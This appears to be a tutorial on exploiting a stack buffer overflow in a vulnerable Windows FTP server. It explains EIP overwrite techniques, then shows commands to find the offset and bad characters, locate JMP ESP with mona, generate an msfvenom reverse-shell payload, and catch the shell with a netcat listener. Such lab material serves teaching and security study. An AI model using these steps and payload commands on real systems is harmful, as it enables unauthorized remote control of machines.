Perquisites
Mitigations
Introduction
Buffer Overflow can occur in many ways and there are many ways to exploit them. These are the few of them methodologies:
1- In most of cases attacker prefers mostly using this technique in simple buffer overflow. That after overflowing the buffer and EIP, call ESP/JMP ESP from executable library which is already loaded into program. With this at a moment we call ESP into EIP and ESP and EIP pointing to the same stack address. For example x90x90x90x90 and we assume that our shellcode is starting after this 4 bytes NOPS.
EIP (Extended Instruction Pointer) to pointing towards no operations and after that injected shellcode
2- Stack behavior totally depends upon program whom is programming it and compiler sometime. Programmer use some techniques that if somehow buffer is going to be overflow after it overflow at the character should be converted into X or Y or any single character. Due to this upper that will not work because all the shellcode converted in junk and in result program will crash and program execution will stop. In this case by viewing bad characters of program and it does not exist in stack address attacker will pass address of starting of shellcode in EIP. Due to which execution will be continued and shellcode already present in buffer will be executed. ‘NOPS starts at 77887457’ this method is very rare in case of buffer overflow.
Instruction pointer executing instruction that is place in higher level memory location in stack.
3- Sometimes in stack there is junk values after or before ESP and after EIP. If we start our shellcode exact after EIP ends and ESP start, it will not execute due to this program crashes. Attacker use to compensate ESP and add some Jump instructions because expect for EIP all other registers can execute opcode.
Junk values occurs between ESP (Extended Stack Pointer) and shellcode to compensate this issue small jmp code (Jump) is added which is executed by EIP (Extended Instruction Pointer)
4- There is some other technique which is very rare to use in buffer overflow just in case we don’t find any other method so this may work. POP, POP, RET. In which EAX and EBP are POP and RET after that JMP ESP is used from same library for example kernel32.dll.
Simple Buffer Overflow
– Code (PoC) | Download Vulnerable Application
FTP server is already loaded into immunity debugger and crashes after execution of this code:
┌──(root💀kali)-[~/FTP]
└─# python PoC1.py
ESP and EIP both are over written by character M (4D), that’s why program get crashed. To find exact offset where EIP get overflow, need to generate string via msf_create_pattern:
┌──(root💀kali)-[~/ /FTP]
└─# msf-pattern_create -l 500
It will create string of 500 characters:
String of 500 characters is made to check fuzzing length of application running on windows operating system FTP (File Transport Protocol).
To find exact offset at which EIP get over written program is loaded into debugger and PoC2.py executed.
┌──(root💀kali)-[~/FTP]
└─# python PoC2.py
After executing this command program will crash again but this time with unique address in EIP.
String in EIP is exact match for offset at this offset EIP get overwritten and application get crashed.
┌──(root💀kali)-[~]
└─# msf-pattern_offset -l 500 -q 41326941
[*] Exact match at offset 246
246 is number of characters after that EIP get over written now looking for bad characters to execute payload smoothly. To find bad character we send long string after offset of EIP that means after sending 246 long string we can send custom [ x01 … xff ] to check which are bad characters. x00 is always consider as bad character in each case.
┌──(root💀kali)-[~/FTP]
└─# python PoC3.py
x0a is replaced with 27 that shows that x0a is bad character for program. These are the bad characters found within the program “x0ax00xffx0dx20”. Now we need to find (jmp esp/call esp) from any dll and that instruction must be executable, to find modules we can use mona in immunity debugger.
We choose Kernel32.dll well known library in windows NX is off for it and ASLR is on but for once it will execute perfectly unless system reboots. Finding address by using command in immunity debugger !mona jmp -r esp -m kernel32.dll
Mona save all the address of kernel32 of jmp code into text file.
┌──(root💀kali)-[~]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.6.142 LPORT=4444 -b ‘x00x0ax0dx20xff’ -f py -v shellcode
It will print shellcode on terminal we need to copy that shellcode into our program but first we need to turn on listener in Kali Linux because we are using local-port 4444 we turn on listener on port 4444.
┌──(root💀kali)-[~]
└─# nc -nvlp 4444 listening on [any] 4444 …
┌──(root💀kali)-[~/FTP]
└─# python PoC4.py
ON ANOTHER TERMINAL WHERE nc IS LISTENING ON PORT 4444
┌──(root💀kali)-[~]
└─# nc -nvlp 4444 listening on
[any] 4444 …
connect to [192.168.6.131] from (UNKNOWN) [192.168.6.144] 50792
Microsoft Windows [Version 10.0.10586] (c) 2015 Microsoft Corporation. All rights reserved.
C:Users>